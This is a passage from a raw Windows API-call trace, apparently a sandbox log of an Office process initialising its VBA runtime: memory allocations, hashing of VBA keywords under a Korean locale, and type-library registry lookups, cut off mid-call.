wcsncpy_s (in: _Destination=0x33e4fb4be0, _SizeInWords=0x108, _Source="*\\Z0261d40718", _MaxCount=0x106 | out: _Destination="*\\Z0261d40718") returned 0x0 [0059.062] CharLowerBuffW (in: lpsz="*\\Z0261d40718", cchLength=0xd | out: lpsz="*\\z0261d40718") returned 0xd [0059.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0261d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb4b10, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0261d40718", lpUsedDefaultChar=0x0) returned 14 [0059.063] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x84) returned 0x1d39d83cca0 [0059.063] wcscpy_s (in: _Destination=0x1d39d83cd10, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0059.063] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x180) returned 0x1d3980a7130 [0059.063] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb8) returned 0x1d39d7fcb90 [0059.063] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb8) returned 0x1d39d7fd0d0 [0059.063] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39d8b1cf0 [0059.063] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x80) returned 0x1d39d83d3f0 [0059.063] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39d8b1f30 [0059.063] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39d8af8f0 [0059.063] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x28) returned 0x1d3982144d0 [0059.063] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x10) returned 0x1d39d86f160 [0059.063] GetLocaleInfoA (in: Locale=0x412, LCType=0x1004, lpLCData=0x33e4fb484c, cchData=6 | out: lpLCData="949") returned 4 [0059.063] atoi (_Str="949") returned 949 [0059.063] GetLocalTime (in: lpSystemTime=0x33e4fb4840 | out: lpSystemTime=0x33e4fb4840*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x4, wDay=0x18, wHour=0x8, wMinute=0x24, wSecond=0x28, wMilliseconds=0x165)) [0059.063] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d83caf0 [0059.063] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a7c80 [0059.063] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d83d900 [0059.063] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d3982154c0 [0059.063] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d83c550 [0059.063] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d83c550, cb=0x280) returned 0x1d39d9817e0 [0059.063] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a7990 [0059.063] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a7ef0 [0059.063] VirtualAlloc (lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3260000 [0059.064] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x1d3a3270000 [0059.064] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x420) returned 0x1d39d9d4b80 [0059.065] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9d4b80) [0059.065] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="0") returned 0x501047 [0059.065] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x30) returned 0x1d39d44d0e0 [0059.065] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a32b0000 [0059.065] VirtualAlloc (lpAddress=0x1d3a3270000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3270000 [0059.066] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Abs") returned 0x5072bc [0059.066] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Access") returned 0x501d98 [0059.066] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="AddressOf") returned 0x50e252 [0059.066] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Alias") returned 0x50bf6d [0059.066] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="And") returned 0x507469 [0059.066] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Any") returned 0x50747a [0059.066] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Append") returned 0x508f83 [0059.066] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Array") returned 0x509183 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="As") returned 0x505c8d [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Assert") returned 0x5096e9 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="B") returned 0x501059 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Base") returned 0x50afa9 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="BF") returned 0x505ca5 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Binary") returned 0x5008a0 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Boolean") returned 0x50978e [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ByRef") returned 0x5074ef [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Byte") returned 0x501a83 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ByVal") returned 0x5089c5 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Call") returned 0x50744b [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Case") returned 0x507547 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CBool") returned 0x504c74 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CByte") returned 0x506d3c [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CCur") returned 0x508050 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CDate") returned 0x508dc3 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CDec") returned 0x50834a [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CDbl") returned 0x5082e4 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CDecl") returned 0x50a0b9 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ChDir") returned 0x50b2fb [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CInt") returned 0x509f65 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Circle") returned 0x503fd1 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Close") returned 0x5005ab [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Compare") returned 0x50af82 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Const") returned 0x50517a [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CSng") returned 0x50d4d2 [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CStr") returned 0x50d5bb [0059.067] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CurDir") returned 0x501bab [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CurDir$") returned 0x50f7cc [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CurDir") returned 0x501bab [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CVar") returned 0x50e307 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CVDate") returned 0x50cfd6 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CVErr") returned 0x508902 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Currency") returned 0x50f106 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Database") returned 0x50eec7 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Date") returned 0x503b0a [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Date$") returned 0x5031c7 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Date") returned 0x503b0a [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Debug") returned 0x50eaee [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Decimal") returned 0x5036dd [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Declare") returned 0x504a38 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefBool") returned 0x5091ad [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefByte") returned 0x50b275 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefCur") returned 0x50cc45 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefDate") returned 0x50d2fc [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefDec") returned 0x50cf3f [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefDbl") returned 0x50ced9 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefInt") returned 0x50eb5a [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefLng") returned 0x50fb58 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefObj") returned 0x50096b [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefSng") returned 0x502088 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefStr") returned 0x502171 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefVar") returned 0x502ebd [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dim") returned 0x5083c4 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dir") returned 0x5083c9 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dir$") returned 0x506567 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dir") returned 0x5083c9 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Do") returned 0x505cf8 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DoEvents") returned 0x509634 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Double") returned 0x500d99 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Each") returned 0x50fe75 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Else") returned 0x503b56 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ElseIf") returned 0x50f307 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Empty") returned 0x50f4f1 [0059.068] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="End") returned 0x5089cd [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="EndIf") returned 0x5078bd [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Enum") returned 0x50465a [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Eqv") returned 0x508a4e [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Erase") returned 0x5080da [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Error") returned 0x50db3c [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Error$") returned 0x50cf60 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Error") returned 0x50db3c [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Event") returned 0x50ac4b [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Exit") returned 0x507a1f [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Explicit") returned 0x50edcb [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="F") returned 0x50105d [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="False") returned 0x502d01 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Fix") returned 0x508e81 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="For") returned 0x508f59 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Format") returned 0x502337 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Format$") returned 0x50efc7 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Format") returned 0x502337 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="FreeFile") returned 0x50483a [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Friend") returned 0x50bd1c [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Function") returned 0x507810 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Get") returned 0x509342 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Global") returned 0x50f88f [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Go") returned 0x505d67 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="GoSub") returned 0x50b425 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="GoTo") returned 0x50d70b [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="If") returned 0x505da8 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Imp") returned 0x509f18 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Implements") returned 0x50a988 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="In") returned 0x505db0 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Input") returned 0x50022a [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Input$") returned 0x507767 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Input") returned 0x50022a [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="InputB") returned 0x507785 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="InputB$") returned 0x500c59 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="InputB") returned 0x507785 [0059.069] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="InStr") returned 0x50120e [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="InStrB") returned 0x50c2fb [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Int") returned 0x509f41 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Integer") returned 0x50b48a [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Is") returned 0x505db5 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="LBound") returned 0x501e0b [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Left") returned 0x507be5 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Len") returned 0x50adf9 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="LenB") returned 0x507cfb [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Let") returned 0x50adff [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Lib") returned 0x50ae81 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Like") returned 0x5091f3 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Line") returned 0x509262 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="LINEINPUT") returned 0x5008f1 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Load") returned 0x50b096 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Local") returned 0x50353f [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Lock") returned 0x50b0e7 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Long") returned 0x50b27a [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Loop") returned 0x50b2a8 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="LSet") returned 0x50c69e [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Me") returned 0x505e3b [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Mid") returned 0x50b3dc [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Mid$") returned 0x50566d [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Mid") returned 0x50b3dc [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="MidB") returned 0x50568b [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="MidB$") returned 0x502a70 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="MidB") returned 0x50568b [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Mod") returned 0x50b4ba [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Module") returned 0x501ee1 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Name") returned 0x50f2f0 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="New") returned 0x50b8b3 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Next") returned 0x5009bb [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Not") returned 0x50ba23 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Nothing") returned 0x505f21 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Null") returned 0x505d87 [0059.070] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Object") returned 0x502ec1 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="On") returned 0x505e8e [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Open") returned 0x500767 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Option") returned 0x50f982 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Optional") returned 0x50675a [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Or") returned 0x505e92 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Output") returned 0x50f959 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ParamArray") returned 0x505941 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Preserve") returned 0x50a5fc [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Print") returned 0x50f00d [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Private") returned 0x5073c3 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Property") returned 0x50d2f6 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="PSet") returned 0x50dd55 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Public") returned 0x501287 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Put") returned 0x50c5b3 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="RaiseEvent") returned 0x50274a [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Random") returned 0x50f428 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Randomize") returned 0x50ab02 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Read") returned 0x501d0f [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ReDim") returned 0x50eea8 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Rem") returned 0x50ce0e [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Resume") returned 0x50728b [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Return") returned 0x5038eb [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="RGB") returned 0x50ce4d [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="RSet") returned 0x506891 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Scale") returned 0x50e596 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Seek") returned 0x50e387 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Select") returned 0x50cabd [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Set") returned 0x50d36e [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Sgn") returned 0x50d3b2 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Shared") returned 0x50479e [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Single") returned 0x50a99f [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Spc") returned 0x50d4f4 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Static") returned 0x5029c6 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Step") returned 0x503384 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Stop") returned 0x5034f6 [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="StrComp") returned 0x50274d [0059.071] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="String") returned 0x50102a [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="String$") returned 0x50c31c [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="String") returned 0x50102a [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Sub") returned 0x50d5ac [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Tab") returned 0x50d821 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Text") returned 0x50abed [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Then") returned 0x50b933 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="To") returned 0x505f48 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="True") returned 0x50f0f4 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Type") returned 0x500007 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="TypeOf") returned 0x501832 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="UBound") returned 0x50ea71 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Unload") returned 0x504e44 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Unlock") returned 0x504e95 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Unknown") returned 0x50a11d [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Until") returned 0x50ecec [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Variant") returned 0x508738 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Wend") returned 0x5035a7 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="While") returned 0x50a25c [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Width") returned 0x504e68 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="With") returned 0x504bed [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="WithEvents") returned 0x50f2eb [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Write") returned 0x505c2e [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Xor") returned 0x50ef9b [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="#Const") returned 0x50f8c9 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="#Else") returned 0x5050dd [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="#ElseIf") returned 0x50e5b5 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="#End") returned 0x50d478 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="#If") returned 0x50d383 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Attribute") returned 0x50ed01 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Base") returned 0x509fb8 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Control") returned 0x50a946 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Creatable") returned 0x501d92 [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Customizable") returned 0x50c26d [0059.072] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Description") returned 0x5009d0 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Exposed") returned 0x5030b3 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Ext_KEY") returned 0x50a88e [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_HelpID") returned 0x503e41 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Invoke_Func") returned 0x50c92c [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Invoke_Property") returned 0x507f4a [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Invoke_PropertyPut") returned 0x506658 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Invoke_PropertyPutRef") returned 0x505b25 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_MemberFlags") returned 0x508db7 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Name") returned 0x50e2ff [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_PredeclaredId") returned 0x505fc7 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_ProcData") returned 0x507005 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_TemplateDerived") returned 0x509f1e [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_VarDescription") returned 0x503303 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_VarHelpID") returned 0x50a3b6 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_VarMemberFlags") returned 0x50b6ea [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_VarProcData") returned 0x501b0c [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_UserMemId") returned 0x507b95 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_VarUserMemId") returned 0x504d5f [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_GlobalNameSpace") returned 0x50ce77 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName=",") returned 0x501043 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName=".") returned 0x501045 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="\"") returned 0x501039 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_") returned 0x501076 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLngPtr") returned 0x505ab0 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefLngPtr") returned 0x5036f2 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="PtrSafe") returned 0x506f4a [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLngLng") returned 0x504463 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefLngLng") returned 0x5020a5 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="LongLong") returned 0x50378e [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="LongPtr") returned 0x50d4e8 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="0") returned 0x501047 [0059.073] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="0") returned 0x501047 [0059.073] StringFromGUID2 (in: rguid=0x1d398603660*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x33e4fb3780, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0059.073] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x33e4fb3440 | out: phkResult=0x33e4fb3440*=0x11f6) returned 0x0 [0059.074] RegOpenKeyW (in: hKey=0x11f6, lpSubKey="{00020905-0000-0000-C000-000000000046}", phkResult=0x33e4fb3438 | out: 